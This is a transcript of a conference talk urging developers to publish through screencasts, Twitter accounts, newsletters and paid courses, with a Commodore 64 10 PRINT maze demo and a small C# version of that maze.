Hi, Somer Fraan Norge. Good. I don't speak any Norwegian. That's the single line that I can actually speak. I just wanted to sort of say, you know, what the audience is going to be like. And I'm guessing most of you are from Norway. But I did just to make you feel comfortable also put my title slide into Norwegian. I have no idea if this actually translates properly because this is Google Translator Action. So that's as far as I'm in Norwegian goes unfortunately. It's good. You might know so it doesn't have the profitable in it. I thought maybe that might not quite work so well. So I've just stripped that out of it and you'll see why as I go along. But I had another speaker actually come up to me and say, because they knew what my talk was going to be like. And they said, you know, you have to be careful with Norwegian audience because they don't always interact very strongly. And I usually have like an interactive kind of element in my talks. And I thought, it's a load of nonsense. So, you know, if I start picking on you and pointing at you then unfortunately you might have to say something. But I thought I'd go online and just see what typical Norwegian kind of group of people would look like. And unfortunately this is the closest that I found. But I don't think they're actually representative of the entire question. But that's as far as I got. So who owned one of these? A few people. What was the Norwegian equivalent of this? Did Norway have its own microcomputer type thing? Because we had in the UK a BBC Micro which was like made by the BBC and that's what we had at school. But was there a Norwegian computer, anyone? There was. What was it called? Tiki. T-I-K-I. And they're still like people that collect those and, you know, still have kind of events about them and stuff. No, you're not one of them then. No, you're not one of them then. It was originally meant for the media. Ah, cool. So yeah, it's cool to see that Norway had that as well. Because, you know, we had that in the UK and I think France had their own and now obviously we're all just using the same stuff all over the world. And it's a bit boring really. But what I want to do is actually want to go back to the past and because, you know, I'm British from the land of Doctor Who, I actually want to bring in a Commodore 64 for some action. So if you ever did code, you know, on a computer like this in the 80s, you'll probably remember that you could do stuff like this. Assuming it's actually running, of course. Which for some reason. It doesn't seem very happy with me. What I'm going to do is reset it. That's funny. It all worked in my test, of course, but it doesn't necessarily mean it's going to work now, does it? Right, unfortunately it puts in this really horrible mode that makes it look like an old screen. But never mind, you can make that out, that's good. So you might remember that you could do stuff like this, really boring stuff. But something else you could do is you could print out individual characters based on their ASCII value. So obviously we all know 65 is A, it's kind of boring as well. But the Commodore 64 had always kind of extended codes, a bit like the PC does. Sort of the extended ASCII set that would allow you to draw blocks and lines and things like that. And two characters in particular, 205 and 206, which allow you to draw a left line and a right line. You think, okay, that's kind of boring. 
So what I'm going to do is I'm actually going to create a program that, rather cleverly, will randomly jump between one or the other. So if I run this code, and this is yes, good old fashioned line numbers here. If I run this code it will either print out a left line or a right line, like so. And just to kind of make it really cool, I could go 20 and go to 10. If you run this, it's not going to be that interesting. It's just loads of left and right lines, kind of boring. If I start again from scratch and make a slight change to this program, and this is one of the problems of this, is the editing single line, you have to kind of rewrite the line, which isn't very good at all. But there we go. So I've now written a slightly different line. So if I run this, a very interesting kind of outcome occurs. And this essentially is a maze. You can take out all of this and print this out on a printer, which people did used to do in the 80s. You could then give it to the kids or whatever, or just sit and work it out yourself and go through it like a maze. And that's all from one line of code, very, very basic stuff. And you might think, well, why am I bringing this up at all? Because it's kind of very historic stuff. And just to prove that you can do this in the modern world, I made a Ruby version that uses unicode symbols for doing exactly the same thing. And I've had to add in a delay, because obviously the Commodore 64 is very slow, whereas my machine is very fast. So just to give you the same impression, that's doing the same thing in Ruby. So wow, great fun. If you do want a challenge at all, and if any of you are mathematically inclined, and you want some fun, as I tried to do on the plane right here, see if you can work out what the probability is of, as each line goes down, what the probability of actually having a solution is, turns what you consider fun. I actually do consider that fun. I'm very weird. So why is this relevant? Well, it's relevant because of this book here. Someone actually kind of remembered this line of code from their time in the Acer with this computer, and kind of brought it into the modern world, and wrote all about it. And there's about five or six authors on this book, and it just digs into, I mean, I can't really show you the pictures, because you're too far away, but there's pictures of different versions of this maze, different ways of constructing the maze, the history behind Commodore Basic, the history behind creative computing, pretty much from scratch, is covered in this book. It's a really cool book, and I've got a link to it in the notes that I'll give you at the end of this. And the reason I find it kind of interesting is that it's only through writing a book, or writing a blog post, or sharing some information that these people are actually able to take their passion for whatever it was, so in this case, creative computing, and actually turn it into something that people would want to read, or would want to buy, and can actually fuel the effort that they put into actually promoting this stuff. So I'm going to go back to the presentation now, and here's just a slightly bigger picture of the book. In case you want to pick it up, it's called basically 10 print, and then I won't pronounce the rest. Don't even put that into Amazon, because I don't think it will find it for you. So I just want to quickly nail down what is publishing. 
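For anyone who wants to play with the idea without digging out a Commodore 64, the same one-liner translates to a few lines of C# using the Unicode diagonal box-drawing characters. The speaker's own port was in Ruby; this is just an equivalent sketch, and your console font needs to support the two glyphs.

using System;
using System.Threading;

class TenPrintMaze
{
    static void Main()
    {
        var random = new Random();
        while (true)
        {
            // Randomly pick one of the two diagonals, like PETSCII codes 205/206 on the C64.
            Console.Write(random.Next(2) == 0 ? '\u2571' : '\u2572');   // the two diagonal line characters
            Thread.Sleep(10);   // slow it down so it scrolls roughly like the original
        }
    }
}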
Well, publishing in the long, long, very, very old days was pretty much the action of owning a printing press, which was pretty rare, and I mean, even if you go back further than that, you had the church, and they had their scribes, writing out Bibles, and so on and so forth, and it was either that or folklore. You could pass on stories just by telling them to people, but they would change over time, which is not very useful. So when the printing press came out, basically someone could say, you know, I run the printing press, do you have anything to print? Have I got anything to print? And then I can run it out for you. So there was a real control over who could share what. That's something that we actually don't have nowadays. So if you think about all the different tech publishers, for example, you know, there's tons, O'Reilly perhaps being the sort of canonical example of a tech publisher, but there are so many others. I'm sure if you do .NET, you've probably owned quite a few books from Microsoft Press, for example, and I know many of the other speakers here have written books that you probably own. But these people act like gatekeepers. They have to approach you, you have to go to them with an idea, they have to like it, it has to go out in that way. And I don't think that that's really what publishing is about anymore. So when I use the term publishing, I'm actually referring to anything that you would do in your day-to-day jobs as a developer that isn't documentation and isn't coding. It's, you know, you're kind of thinking a little bit further ahead. You're kind of trying to get your ideas down and share ideas. So there's almost kind of a marketing aspect to it. And you might own this book if you are particularly interested in collecting programming books, which I am. I have a massive collection. I kind of have to have an office just to have all my books in. It's kind of a hobby of mine, again, very, very sad, I know. But this book is very interesting because it's one of the most owned programming books over the years, but also because it was the way to share knowledge about a language at a certain period of time that we don't have to do now. So back when C was invented, what was it, 1971, I believe? This book came about a bit later in the 70s? It was around then, you know, it was in the 70s. And they had to write a book to really explain what the C language was and why you'd want to use it, and all the basic kind of examples of how it all comes together. And then that knowledge has been passed down through the years, kind of almost like programming folklore, except it hasn't had to be repeated and got poorly translated. Although if you do code C, you know that if you go into some of the examples in this book now, they're not actually that relevant anymore because they work with a very, very antique version of C. So when I say publishing, I mean the whole gamut of things, and we're going to go over what are some of them in a minute. But I want to touch on why should you publish stuff. For me, it's really all about kind of having your own voice and your own audience in some way or another. It's very easy to just like be known and become kind of well-esteemed as just a developer.
And I don't mean that in any kind of derogatory way, but you will see a lot of the people that like speak at conferences, you know, people that run events and things like that have tended to become known because they've perhaps written something, or they've starred in a video, or they've been on a podcast, or things like that. That tends to be like the deeper fabric of how to kind of get on in a long-term career as a software developer. So I've always been interested in that side of it. And I was just a kind of very normal software developer for some time. I did a lot of Perl, so you can feel very sorry for me there. Unfortunately, I never got into the whole.NET side of things. I've always focused on open source stuff, and then Ruby. And you'll see Ruby come up a few times in this talk. But it's actually gone the other way now. So I was a developer who was interested in publishing, whereas now I seem to have become a publisher who kind of develops on the side. And so the reason I love it is because it gives you an audience to, you know, promote things to, to kind of get a message out if you want to invent something. It's just really great to have that audience there. And of course, something else that's really good is that if you become good at sharing your ideas, and you don't have to be a full-time publisher like I'm trying to do, you can be a publisher, a programmer who does publishing a little bit of the time, the good thing is it can sometimes allow your ideas to win over other people's. Because many people aren't interested in sharing their ideas, or at least not in a very productive, kind of driven way. So you will often see situations in life, and I know I've had this where there's a technology, or there's something that you've done, and other people have perhaps mediocre solutions. You see them as mediocre solutions. They may not be, of course. But their solution is doing well. It's getting to the top of Hacker News. It's doing well on Reddit. People are talking about it. People are using it. And your idea, not doing so well. So learning about publishing and kind of taking control of that can allow you to sometimes win some of these games. And we've seen this particularly with projects like JQuery, WordPress, Rails is a very big example. Because part of what actually drove Rails to success over some of the competing things that were out at the time was they really focused on things like screencasts. So one of the main things they had on their site was how to build a blog in 15 minutes with Rails. And that won so many people over in a very early period of having video everywhere on the internet, like YouTube hadn't even been invented at that point. So it was a really big deal that they did that. And if they hadn't done that, it may not have taken off so quickly, and perhaps something like Django would now be in the position where Rails now is. So this is where I'm going to quickly break into a video for you. Because the other thing that I want to talk about is how publishing something allows you to define the perception of something. So you might be in an area that you might consider to be reasonably boring in development. You might be working on a very tiny focused area of what you do. You may just want to kind of promote it in some way by twisting it around. 
And I came across a really good example of an ad in the US, sorry, I think it was Canada, for a cereal called Shreddies, which are basically these small kind of like weedy kind of meshed biscuit things that people eat for their breakfast. And they're square, they're boring, how can you make them new? You can add sugar to them, you can do things like that. But how can you just take the base product and make it more interesting? Well, they found a way. Shreddies are supposed to be square. Have any of these diamond shapes gone out? No. So this was really the whole thing about changing the perception of something. And if you are a publisher or you're in the position to actually run advertising or something along those lines, then you have a way of being able to kind of define the message. And it's a really good way of actually getting involved in open source projects is to get involved with how they're marketed sometimes, because you actually get a quite small story, just because I know I've got the time to tell it, is that this chap, and again his video is linked in the notes that I'll give you at the end, that they wanted to spend £6 billion, so I think that's about like £50 billion, a crooner or something like that, on improving the Euro-star from London to kind of like the coast of England essentially, because the French part was always really nice and fast, the English bit kind of sucked, which is very typical of England. So they wanted to spend all this money on improving it. And he suggested that perhaps they should just think about this problem in a different way. Rather than saving 40 minutes on the trip, maybe they should spend half of that money, the £3 billion, on hiring all of the world's top male and female supermodels, get them to walk up and down the train with champagne, and make everyone's journey a much better time, because then they might even argue that they'd like the train to be slowed down. So this is just a case of where you can think about things a slightly different way and change people's perception of things. Now, I know one thing that often stops people from doing what I'm going to be recommending next is they don't know what to do, or they're kind of worried about what the impression is going to be if they do try to do it. I've given a talk before about something called imposter syndrome, which is something that is very common. I speak to a lot of people who speak, and people are really at the top of the game, and not me, by any stretch. And again, perhaps I'm expressing imposter syndrome here. But people, you know, the famous names that you know, and they're kind of like, I get up on stage and I don't think I should be here, and I've only done this and this, and it all kind of feels false. And this kind of phenomenon has been played about with by the social scientists, and they've called it imposter syndrome. And one thing that happened in their studies of this is that they went into the mission class at Harvard, and I think it was like medicine. These people were like, top of their game. They've done very well to get there. And they sort of said, right, you know, on the count of three, you know, put your hand up if you think that you just managed to kind of scrape into getting into Harvard. You know, you were kind of really lucky. You just got straight in and you feel really sort of lucky to be here. And about two-thirds of the class put their hand up. 
So I think just acknowledging the fact that that happens and that sometimes you think, I'm not ready to do this. I don't know much. I'm not ready to write about something. You just need to sometimes draw a line under that, and good things will flow on from there. I know it's very easy to say that, stood on a stage actually discussing this, but it really is true. You know, whenever I've tried to, and I felt ignorant about something, just the fact that I've written about it or published something about it has helped me become confident about doing it. So sometimes you just need to, you know, bite the bullet as it were. And there is a quote about this, and that is, if the lion doesn't tell his story, the hunter will. So you need to be the lion basically, and go out there and tear things up. So this is a slightly interactive part, and I need you to shout out a few things. I've made a list of the different types of ways that, you know, programmers can publish things. But I just want to see if anyone's got any ideas that I haven't got. So obviously, you know, perhaps the first one to suggest is podcasting. So if anyone wants to shout out anything else, what else is there that people could do? And I'm actually going to write these down in case I have a new one from you. So just shout. Blog posts. Blog posts. Ah. Now that wasn't on my list. That's a really good one. Yes, I recognize your voice actually. I think you might be. Okay. So blog posts. I've got at least 12 of these. Videos. Articles. Articles, yeah. Tutorials. Huh? Exactly, yeah. Speaking at conferences. Twitter. Code. Ah. Okay. Yeah, it seems to keep going in and out. Is it because it's moving or is it because of the... Oh, we're going to change over. Okay, if anyone else wants to shout out anything, but I think we're doing quite well. Nope. Okay. GitHub with... Open source repositories. So yeah, similar to the code one, I guess, but yeah, GitHub in particular is a really good place. Okay, I'm going to wrap this up in a sec. Any last straggling kind of ones coming in? No. Okay, right. I'll show you the list that I came up with. So there's a few actually you didn't come up with here. So like email. I'm actually kind of biased with email because my main kind of operation is running a company that publishes email newsletters like JavaScript weekly and Ruby weekly and just a whole ton of different things. And that's kind of my main day-to-day work. In fact, as soon as I've done this talk, I have to rush out and do one. But yeah, screencasting that was mentioned in the video blogging. Again, I've mentioned video separately because there's two different types of... Just to give you an impression actually, because you probably all know what screencasting is, but here is an example. She's hoping it will load, of course. Don't want that coming up. There we go. Hi, I'm Ruby on red. Let me just show you an example of what I would call a video rather than a screencast. Hi, I'm Ruby on rails. And I'm.NET. What's going on,.NET? I was just counting my pennies making sure there's enough money in the budget for Windows Server 2008. Upgrades are cool, but they're not cheap, you know? Well, Ruby on rails is open source, which means there's no cost involved with development or deployment. Well, I guess you get what you pay for. Well, most development languages these days are going the way of open source, which means they're completely free. Free? Let me tell you about free. 
I saw this ad on Craigslist for a free iPod if you just send in some naked pictures of yourself. Well, it's been three weeks. I'm still waiting. Hey, can I borrow five bucks? Is it for the Windows Server or for the Booze? Windows Server, I promise. So this is actually a very, very old video, and obviously I wouldn't call this a screencast by any means. But these guys are trying to kind of get into the Ruby on Rails world very early on, and they thought the best way of doing this is to make some funny videos, because they're interested in video production and stuff anyway. So they produced these videos, and they were kind of considered to be funny enough, edgy enough, that at RailsConf, which was very big at the time, not quite so big now, but a good conference, they actually got them to play them on the keynote stage, and they kind of became almost famous overnight in that community, and they both got on to do very well in their kind of perspective endeavors. So that's what I would consider to be video. It's things that are a little bit more flippant perhaps than screencast, which is meant to be more useful. So just a few other things, and we'll touch on a couple of these in a minute, but eBooks, courses, podcasting, Twitter, I'm sure you can read my slides better than I can, and one at the end that a lot of people don't come up with is webinars, which a lot of people really hate the word webinar, which is why we rightly call them webcasts. It means exactly the same thing, and it's using the same decrepit technology underneath, but yeah, it's really, again, it's about perception, because you can make a video about a certain topic, and I know there's a few speakers at this conference who've recorded videos about things. I think John's sitting there, it's one of them. And you can buy the videos or you can watch them on YouTube or whatever, and that's all well and good. But if you take that and you make it live, and you say, right, you have to turn up at 6pm at a certain URL, and then you can watch, we give the talk live, and you can ask questions on this chat room and everything like that, people seem to get that there's slightly more value in that, and people even actually have done replays of talks. So I'm a chair of a conference in the US called Fluent, and what we do is record all the talks just like you do here, but after a year has passed, obviously we want to promote the next conference, we will take some time for the really best talks from the last event, and then we'll run them as webinars for the next thing. This isn't like a big secret or anything, but they are just basically replays. But people are on Twitter going, wow, I'm really enjoying this talk that I'm watching at the moment, and it seems that they seem to find more value in doing something live, even if the person at the other end is actually in a hall a year ago. So bear that in mind about this whole perception thing. So what I'm going to do now is, this is where it gets slightly more interactive again, is I'm going to pick from that list a couple of different of the media types, and then walk through just from my point of view what they are, what are some really good examples of doing this, and how you should get on with doing some of this stuff if you have something that you want to share. So actually it's probably best if I went back to my list to be honest. So first person to shout one out, I'll try and tackle it. Go. Video. Okay, so luckily I've already started with a video one by showing you that. 
I'm actually going to tie in screencasting with it, just because I have a little bit more to say about screencasting, because it's something that I've done. The good thing about screencasting is you don't have to be particularly attractive to do it, because you can just load up a program, click record, get writing, get typing code, and bam, you end up with a product. So just to give you a very basic example, so I have a program on here called ScreenFlow for example, which unfortunately is not very zoomed in, hopefully that will work. If you are on the Mac you can use ScreenFlow. If you are on Windows there's a program called Camtasia. Again, I've linked these in the notes that I'm going to give you. But what this will allow you to do is it will allow you to record some videos, so I hope this isn't going to break everything. So there you go, there I am. It will allow you to record audio and also the computer audio. So if I record at this point, I could be sitting here doing my whole thing about the maze stuff or whatever, giving some demos, I could even be moving around in my folders setting things up for demos and stuff like that. And then once I'm finished, I can come back in, I can stop the recording, and very, very simply I can start playing around with these aspects. So I might want to shrink that right down, make myself look a bit thinner. There you go. And just play around with it, crop it and all that type of stuff, just down to the essential parts. And I can also very simply do things like cutting it up. So you can hear there, this is the editing process. I can say cut this piece out, cut out the bit where I did the whole navigate around the directories, and just cut and chop and play around and things like that. And then eventually I can go File, Publish, and push it straight to YouTube, Vimeo, and everything's great. The one thing that I suggest if you're going to do this is that you do try to script it out in some way. And I've tried so many different approaches because I actually have quite a few screencasts out there. I've sort of done an entire course where it's all screencasts and people can buy them. And I've tried two approaches. One is the approach that I've kind of taken with this talk, which is where I have basically, you know, I have listed here a bunch of very, very messy bullet points, and yes, I do still use pen and paper for almost everything. I kind of have a point, I can look at it, and I know, you know, what to say about that point. The other way you can do it, of course, is you can actually sit there and you can type out the entirety of what you want to say, almost like you're writing a book. I've found success with both ways. The problem with the first way is sometimes you can ramble a bit like I'm doing now, and you might miss points out. So even if your bullet points are really good, you can often miss things that you wanted to say, or particular turns of phrase that you wanted to use. If, however, you script everything, you might just find it feels really false, and some people can't read from a script without sounding like they're scripted. That can be a bad thing and may not be what you want in your video. But the key thing is, you need to get something that's really good at recording, so like Camtasia or ScreenFlow, just because it gives you that editing stuff, which is essential. You need a good microphone, so I just did that on the internal microphone. Do not screencast on the internal microphone ever.
If there's one thing you take away, do not do that, because the most common thing you'll hear, because lots of people use MacBook Pros, especially, is you'll hear fans whirring up. If you start their screencast, it sounds not too bad. They'll get a few minutes in, oh, let's compile something, and it'll be like, in the background while they're speaking, and it is really annoying as a viewer. And you will see people will just drop off at that point. So get a separate microphone. I would recommend, and this is just because this is the one I've got, of course, the Rode Podcaster, and I think Rode may even be a Norwegian company. There's a line through the O, so it's all kind of Scandinavian to me. So that's a really good one, but if you want to spend a bit less than that, there's a company called Blue, and they do a bunch of microphones called the Snowball, and the Yeti, and things like that, and they're a good kind of entry-level, basic microphone. But just don't use the internal microphone. Make sure your audio is good, and that really is just a point I have to stress. Make sure the audio is good, because even if you have an accent, or there are just things that you don't like about your voice, which is a problem that I had for many years before doing this, if you just don't like the way you sound, just make sure that your voice sounds good in terms of fidelity, and then people will tend to forgive you. I know there was a popular video out in the Ruby world a couple of months ago, and it was by a guy who's got, I can't remember what the name of the illness is, but it causes him to sound, I'm trying to think how to put this politically correctly, like a Dalek. Yeah, that's probably not the way I should have said it. But it's a very odd voice, and it takes some getting used to, but once you get used to it, it's great, and because it was recorded in high quality, people got used to it, and there were hardly any comments, which is weird being on YouTube, you know, you would expect there to be all kinds of stuff. So just get the audio right, that is very, very important. Oh, and yes, overact. I don't know if it's something that John can attest to, but if you kind of underact, and you perhaps try and be very subtle on a video, it doesn't tend to work, you need to kind of ham it up a bit, a bit like you would if you're speaking on stage like this, you need to speak a little bit louder than you would normally, be a bit more emotive than usual. That helps on video as well. You know, just kind of have fun with it and make a point. So, just thinking, is there anything else that I want to mention about this that I have? Oh, and of course, if you want to get some confidence with this, go back and look at some of the early Khan Academy videos. So the Khan Academy, you've probably heard of it, is this site that Bill Gates seems to love in particular, I think he's put some money into it, and it's just a guy, he sits in his house, he records math videos, he uses a tablet, so he doesn't appear on the video at all, it's just him with a tablet, and he just scribbles like math formulas and stuff, the audio is bad, the way he draws is just really bad, but it's got better over the years, but the fact is the original ones weren't amazing. So, just kind of take confidence from that, that you have permission to be as bad as that. I'm trying to think, you know, I just have to be careful about libeling anyone here. There's another speaking tip for you.
Oh, and last but not least, get to the point fast, unlike me, it really helps if you can start a video by kind of explaining what the outcome is, or even just show the outcome, and then it's like, okay, this is how we get to this outcome. So many screencasts I've seen kind of start by going, right, okay, let's install this, and it's like, what is the actual goal of what we're doing here, what is the end product? Try and start with that and then work your way through. It's a bit like if you are a journalist and you're writing a news story, you don't start with, well, you know, there were some robbers and they bought a gun and then they did this and they did this, oh, and they've broken into the Norwegian National Bank. You kind of start from that conclusion and then you go into the details later on. So, let's go back to our list, because of course you could give a talk about every single one of these things. I'm actually going to pick one now, just because it's kind of dear to my heart, and that is Twitter. So, Twitter is good, good fun, and the reason I know this is because obviously I've been on Twitter a long time, but I'm not going to make you look at my account, because it's kind of boring. See if I can maximize this. It works. I hate this full screen stuff on the Mac, but I kind of have to use it. Right, so I have an account called JavaScript Daily, because I have the JavaScript weekly email. I thought, okay, I have tons of links coming in from people every week, but I can't get into the email, because I don't want the email to be 100 links long. So, I will use a system called Buffer, which is available at bufferapp.com, which allows you to put in tweets and link them up to an account, and it will then leak them out over a period of time. So, my Buffer account will usually have about 20 links stashed, and then it leaks out a few accounts. So, JavaScript Daily is just one of those, and it's all very, very basic stuff, but I haven't put really any effort into promoting this other than mentioning it when people sign up from the newsletter. So, I say, you know, I will follow this if you want a bit more depth. And it's doing quite well. It's only been around less than a year, I think, and it's doing like 24,000 followers. And I think it's sort of like the only, the biggest JavaScript news thing, and I haven't tried to do that at all. It's all been very, very lucky. So, you know, this is the sort of thing you could perhaps do in an area that you're knowledgeable. So, if you're knowledgeable about, you know, perhaps.NET, object relationship mappers or something, maybe there is like a market there for people who want to keep up to date with the new developments in that area. You can find the links, put them into Buffer, bam, you have an account. And the good thing about Twitter is that there are retweets, and I used to really hate the retweet system. I used to like doing it the old school way with the RT and, you know, add a bit more commentary and stuff like that. But I've actually realized that the built-in retweet mechanism is actually one of the best things that's happened because it shares things so widely and keeps the original account, you know, firmly at the center of things. So, if you're perhaps popular on Twitter or even actually not that popular and you write something and the right person retweets it and then someone else retweets it and someone else retweets it, you get that whole viral thing going on. And that is actually how JavaScript Daily has done well. 
It's not just from the people coming in and clicking follow that have, you know, learned about it particularly on its own. It's people that have seen things. So, I know that Brendan Eich, for example, he will occasionally retweet things from this. And of course, he has a giant audience of people who, you know, follow him as being the creator of JavaScript. And so, it's good fun. I sort of enjoy going through these, you know, every now and then just sort of seeing how many retweets they get. And it's not a huge amount considering there's 20,000, like one in a thousand people will retweet, but that really makes all the difference. And I've also had success with this, which was a complete experiment. And this is the thing about publishing is that you can experiment a lot. Like you do with code, you see a new technology and you think, I'll try this. I do the same with publishing now instead. So, one thing I saw that was becoming very popular on Twitter were quotes. People who often just put, you know, some sort of little quote from, you know, people in the past, Plato, and this and that and the other, Shakespeare, whatever. And people always retweet quotes. I don't know why this is, but it kind of makes, it seems like people think that they look smarter if they retweet smart quotes. It's kind of like, oh, he retweeted this. So, I thought, I'm going to lean on this idea and see if I can find lots of programming quotes, create an account, and see if that works. When it did. Unfortunately, I haven't actually updated it in like a really long time. So, you'll see if I scroll down, I go back to like July last year very quickly. Because I kind of almost ran out of quotes I could find. So, you know, give someone a program. You frustrate them for a day. Teach them how to program. You frustrate them for a lifetime. So, there are just tons of these. And I always tried to pick ones that are a little bit funny or you got some really deep insight from. And as you can see, you know, I've just picked one at random really here. And that's, you know, over a thousand retweets. So, it kind of proved my hypothesis that quotes get retweeted. Whereas links, not so much. They tend to get favorited more. People come back and look at later. And that is one thing that people use favorites for on Twitter a lot. So, bear that in mind. But I don't just want to look at my stuff here. I want to look at someone else actually called John D. Cook, who's kind of well known in this sphere. And what I'm actually going to do is I'm going to jump the gun here and go to my page that has all of my links on that I want to show you. Just because it's easier to go into his account this way. There's a guy called John D. Cook. He is a programmer and a bit like me, he kind of dabbles with publishing. And so he's created all these different Twitter accounts that contain tips. So, if I just zoom in a little bit, he started off with like kind of very mathematical ones and like that. But now he's going into doing like computer science, regular expressions. And if you look at how well these are doing, you know, doing very well as well. And you may find these interesting to follow as well. So this is Regex Tip. And just every single day there is a different tip. And they're very basic things, but I know a lot of people have problems with regular expressions. So, you know, you might find this really helpful. It's just a different tip each day. And he doesn't use buffer. He uses something called, I think, Hootsuite for this. 
But it works in a very similar way. And again, he does the same thing with Computer Science Fact, which is usually a bit more link based. So how video compression works and yada, yada, yada. And as you can see, he's not getting a huge amount of retweets again, even though he has 66,000 followers. So do bear that in mind. That is something that happens with his accounts. Of course, you may want to do tweeting from your personal account, which is also worthwhile. One person who's perhaps the master of kind of using their account to get as many followers as possible, without kind of cheating, is a guy called Guy Kawasaki, who used to work at Apple very early on. So he has like, what, a million followers? And pretty much all he does, he just pushes things out, like kind of good headlines, and just links to stuff just constantly. You can see, look, 17 hours, 18 hours, 19 hours. There's at least one or two links every single hour. I used to follow him. I find this really, really annoying. But clearly there are people that love following just constant streams of links. So this could be a way for you to do it. If you do, I would keep it separate from your personal account. Because if you do this on your personal account, you'll completely annoy people that just want to know about things in your personal life. But likewise, people who are interested in the links don't want to read that you just fed your dog or all that type of stuff. And this is kind of the middle ground where I've kind of fallen into a rut with this, is that I try and do both and haven't entirely succeeded. But I'm doing well enough that I'm perfectly happy with it. So yeah, frequency is key for this. If you are going to run an account like that, you need to make sure there's something every day or at least every week. You need to have some kind of frequency to it because people will expect to see all of your stuff coming out. And just in case you do want to follow me, I am @peterc. I have blue glasses on there and I keep having people come up to me saying, why don't you wear blue glasses? Because I've gone to cons... So yeah, so that's Twitter. I don't think there's anything else I actually wanted to say about that. Oh, there is one other minor thing is that on Twitter in the last couple of weeks in particular, there's been this extra link added to the side that sometimes comes up and it will say, do you want to promote your account? And there's this kind of feature where now if you've got something like a links account like that, you can go on, promote it, and actually give Twitter money to kind of, you know, be in the suggested users box of accounts that people should, you know, connect to. If you are, you know, your pockets are full of money, this could be something you would like to do. It's not worth it for me because I think you end up paying something like between like 50 cents and $2 per follower. And I don't think, you know, once you get up to sort of thousands and tens of thousands of followers, spending thousands of dollars or whatever on this is a very good idea. So I'm going to randomly let someone choose another one from this list. I think we have time to do like two more of these. So please choose one I have notes on. Courses. Courses. Oh, yes. Great. Thank you. Yeah, this is one I find really interesting because if you want to, this is where the profitable comes from in, you know, the name of the talk. And I only put that in there because I just kind of like the alliteration of it, just like PPPPP.
But this actually is the part where you can make a profit from doing something. So courses. There's two different ways you can do courses. And again, this is a good place to come into the web browser. You can do them online or off. So in the UK, for example, there's a company called Skills Matter and they are kind of well known for running courses. Often, you know, in the areas of Java and.NET and things like that, you pay an extremely large amount of money and you can go along for a few days and, you know, go and look at one of their courses and they teach you an off you go. And often they will do like a, you know, like a profit share. So they'll give you like a minimum amount of money and then they'll give you kind of a cut of whatever comes in. So if, you know, like 20 people are paying £1,000 to come in, you know, you can actually do very well out of this. But you could, of course, just go and set this up all by yourself. And I'm trying to remember the name of this actual course because I didn't make it. The guy that gave the keynote at the largest NDC, you might, if you were here, you might remember, he actually sang on stage, which is a very interesting experience. But I think June the 14th. Is that today? I'm not very good at dates. Okay, great. Yeah, so this week he's, you know, giving this presentation basically about giving presentations. It's not very expensive, £149, but it's got 50 people coming along. He has a big Twitter following, you know, he's well known, well respected, gives keynotes at things at NDC. And, you know, he's put together this really good page where he just kind of tries to sell you on the idea. And this is all you need, you know, if you have the right audience to put and push something like this to, you know, you have a popular blog, you have a popular Facebook account, you have one of those Twitter accounts that I was just discussing. You know, so if I wanted to promote, say, a JavaScript workshop that I wanted to run, I want to run a JavaScript workshop in London, I want to hire someone to give it. Let's say I give them whatever amount of money, I want to have 50 people come along, pay, I don't know, £300 each. You just have to kind of do the sums and work out, you know, what risks you can afford to take. But you can very easily put on a course and if you're kind of experiencing giving the information like Aril is in this case, you kind of take all the money and just give some to the venue and anyone that needs to help you, bam, you're doing good. This is actually something I'm going to get into later this year. I've got a book to finish first, but I'm actually going to try and do this in London with various topics like Go, for example. It's a very niche topic in London, have a small number of people and just sort of see how it goes. But something I've been doing before all of this, and this actually isn't mine, this is just where I got some inspiration, is there's a couple of developers called Amy Hoyt and Thomas Fuchs, I believe you pronounce this. They run something called the JavaScript Masterclass and they used to run it in person in Europe, in like Austria, Germany, places like that. Thomas Fuchs is well known because he developed Scriptaculus, which was one of the very early effects frameworks built on top of prototype. Which unfortunately has been kind of usurped by jQuery. But he became very famous because of that nonetheless, he's a very good JavaScript developer and he partnered up with his now wife, Amy Hoyt. I think they're married. 
This is where I'm going to have to go back and correct things. But they basically moved from doing it in person to doing it online. So you'll see down here all these virtual editions and then there's just like the four they gave in person. So again, this is a page very similar to the other one. It looks different, but what they say is the same. Do you want to know this? Do you want to know this? Here's some quotes from people that really enjoyed the course, which again you need. Here's their email kind of newsletter sign up if you want to learn about the course. And that's it. And actually I don't think they put the price on here anymore. But it used to be like $520 or something like that. And they'd have like about 25 people on each course. So if you can just do the numbers like what we're looking at there, like about $12,000. And they would run this course on two days. So perhaps just to do, because obviously I know more about my own course than theirs. I previously, before I got kind of busy doing this publishing stuff, ran my own one called Ruby Reloaded, which I haven't run since November last year and I haven't got plans to start again unfortunately. But I still have the page up and I would give two live three hour classes. I would record them all and let people download them. I would have a Q&A forum and I gave away a bunch of books that I'd written one of them and two of the others. I negotiated to pay them a fixed amount and also included in some videos I'd recorded. And I basically did the same thing. I kind of just ripped off their idea. So there's all the different things that what you can do, what happens on certain dates. And then I had the three different tiers. This was something I was trying. So the personal one was like about $700 or $800. But what they would get is they would get free hours of solo one-on-one time on Skype. Kind of almost like a pair programming type thing. There was the main one, which is the live thing and then there was the basic, which was just like, you can just buy the videos but you can't come along to the live thing. You just get the videos afterwards. Because I had people in the army joining up and they were like, oh, I can't watch this on camp or whatever. I just want to download it. So if you kind of just add it up, each time I was trying to make basically $10,000 each time. And I don't think I quite did it each time, but very close. And essentially it's two days work, but of course you have to design and implement a course and be able to deliver it and so on. That part takes a lot of time. But once you've done it once, it's a lot easier to kind of just refine and add things over time. So if you wanted to do something like this, again, it's about having that audience. And that's why I built up these email newsletters and blogs and things like that and you know, star on podcasts and do talks. It's because every time it helps build the audience up so that if I decide to run a course like this on Go, JavaScript, whatever it is that I want to learn and kind of try and become an expert in, I usually have someone that I can promote it to in one way or another. So you kind of need to make sure you've got that kind of approach. How are you going to promote something like this? But then just in terms of the actual basic tech for running it, zoom out a bit. Again, I put these links in the notes. 
